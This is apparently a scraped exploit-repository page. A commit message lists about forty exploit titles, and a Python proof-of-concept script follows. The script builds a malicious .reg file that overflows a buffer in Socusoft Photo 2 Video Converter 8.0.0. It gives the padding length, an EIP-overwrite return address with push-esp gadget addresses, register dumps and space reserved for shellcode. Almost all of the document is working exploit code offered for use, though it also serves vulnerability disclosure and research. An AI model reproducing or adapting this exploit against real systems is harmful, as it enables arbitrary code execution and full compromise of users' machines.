813a3efbb5
20 changes to exploits/shellcodes Allok QuickTime to AVI MPEG DVD Converter 3.6.1217 - Buffer Overflow Jnes 1.0.2 - Stack Buffer Overflow Socusoft Photo 2 Video Converter 8.0.0 - Local Buffer Overflow netek 0.8.2 - Denial of Service Cisco Smart Install - Crash (PoC) Schneider Electric InduSoft Web Studio and InTouch Machine Edition - Denial of Service Linux Kernel < 4.17-rc1 - 'AF_LLC' Double Free Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Local Privilege Escalation (1) Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) Adobe Reader PDF - Client Side Request Injection Windows - Local Privilege Escalation Apache Struts Jakarta - Multipart Parser OGNL Injection (Metasploit) Apache Struts 2.3.5 < 2.3.31 / 2.5 < 2.5.10 - 'Jakarta' Multipart Parser OGNL Injection (Metasploit) Adobe Flash < 28.0.0.161 - Use-After-Free Norton Core Secure WiFi Router - 'BLE' Command Injection (PoC) GPON Routers - Authentication Bypass / Command Injection TBK DVR4104 / DVR4216 - Credentials Leak Call of Duty Modern Warefare 2 - Buffer Overflow Squirrelcart 1.x.x - 'cart.php' Remote File Inclusion Squirrelcart 1.x - 'cart.php' Remote File Inclusion Infinity 2.x.x - options[style_dir] Local File Disclosure Infinity 2.x - 'options[style_dir]' Local File Disclosure PHP-Nuke 8.x.x - Blind SQL Injection PHP-Nuke 8.x - Blind SQL Injection WHMCompleteSolution (WHMCS) 3.x.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x < 4.0.x - 'cart.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x.x - 'clientarea.php' Local File Disclosure WHMCompleteSolution (WHMCS) 3.x - 'clientarea.php' Local File Disclosure Ajax Availability Calendar 3.x.x - Multiple Vulnerabilities Ajax Availability Calendar 3.x - Multiple Vulnerabilities vBulletin vBSEO 4.x.x - 'visitormessage.php' Remote Code Injection vBulletin vBSEO 4.x - 'visitormessage.php' Remote Code Injection WordPress Theme Photocrati 4.x.x - SQL Injection / Cross-Site Scripting WordPress Theme Photocrati 4.x - SQL Injection / Cross-Site Scripting Subrion 3.X.x - Multiple Vulnerabilities Subrion 3.x - Multiple Vulnerabilities Ciuis CRM 1.0.7 - SQL Injection LifeSize ClearSea 3.1.4 - Directory Traversal WordPress Plugin Activity Log 2.4.0 - Cross-Site Scripting DLINK DCS-5020L - Remote Code Execution (PoC) Apache Struts2 2.0.0 < 2.3.15 - Prefixed Parameters OGNL Injection
77 lines
No EOL
2.2 KiB
Python
Executable file
77 lines
No EOL
2.2 KiB
Python
Executable file
# Exploit Title: Socusoft Photo 2 Video Converter v8.0.0 Local Buffer Overflow (Free and Professional variants)
|
|
# Date: 01/12/2017
|
|
# Exploit Author: Jason Magic (ret2eax)
|
|
# Vendor Homepage: www.socusoft.com
|
|
# Version: 8.0.0
|
|
# Tested on: Windows Server 2008 R2
|
|
|
|
# Socusoft's Photo 2 Video Converter v8.0.0 (Free and Professional variants)
|
|
# contains a local buffer overflow condition in the pdmlog.dll library.
|
|
# Exploitation can result in register rewrites to control program execution
|
|
# flow, therefore, resulting in the ability to execute arbitrary shellcode leading
|
|
# to complete system compromise.
|
|
|
|
# Import generated .reg prior to restarting the executable within a debugger
|
|
|
|
# The following PUSH ESP, RETN instruction sequence addresses are suitable to
|
|
# redirect program execution:
|
|
|
|
# DVDPhotoData.dll:
|
|
|
|
# 0x10002352 push esp; ret
|
|
# 0x10013945 push esp; retn 0x0004
|
|
# 0x1004cb83 push esp; retn 0x0008
|
|
# 0x1004cbb8 push esp; retn 0x0008
|
|
# 0x1004cc11 push esp; retn 0x0008
|
|
|
|
# BEGIN EXPLOIT POC
|
|
|
|
#!/usr/bin/python
|
|
|
|
# REGISTERS (POC)
|
|
|
|
# EAX 42424242
|
|
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
|
|
# EDX 00020000 pdmlog.00020000
|
|
# EBX 00020000 pdmlog.00020000
|
|
# ESP 035BFB90
|
|
# EBP 035BFBAC
|
|
# ESI 00000002
|
|
# EDI 00000000
|
|
# EIP 42424242
|
|
|
|
# EAX 10013945 DVDPhoto.10013945
|
|
# ECX 0002BF3B pdmlog.<ModuleEntryPoint>
|
|
# EDX 00020000 pdmlog.00020000
|
|
# EBX 00020000 pdmlog.00020000
|
|
# ESP 03A0FB90
|
|
# EBP 03A0FBAC
|
|
# ESI 00000002
|
|
# EDI 00000000
|
|
# EIP 10013945 DVDPhoto.10013945 <- EIP Overwrite '\x45\x39\x01\x10'
|
|
|
|
# outfile
|
|
file = "proof-of-concept.reg"
|
|
|
|
# register re-write
|
|
padding = "\x41" * 548
|
|
eipOffset = "\x45\x39\x01\x10" # PUSH ESP (0x10013945)
|
|
stackRewrite = "\x43" * 400 # Shellcode Space
|
|
|
|
# generate exploit file containing above payload instructing EIP overwrite
|
|
|
|
poc = "Windows Registry Editor Version 5.00\n\n"
|
|
poc = poc + "[HKEY_CURRENT_USER\Software\Socusoft Photo to Video Converter Free Version\General]\n"
|
|
poc = poc + "\"TempFolder\"=\"" + padding + eipOffset + stackRewrite + "\""
|
|
|
|
try:
|
|
print "[*] Generating exploit contents...\n";
|
|
print "[*] Creating payload file...\n";
|
|
writeFile = open (file, "w")
|
|
writeFile.write( poc )
|
|
writeFile.close()
|
|
print "[*] Success!";
|
|
except:
|
|
print "[!] ERROR!";
|
|
|
|
#EOF |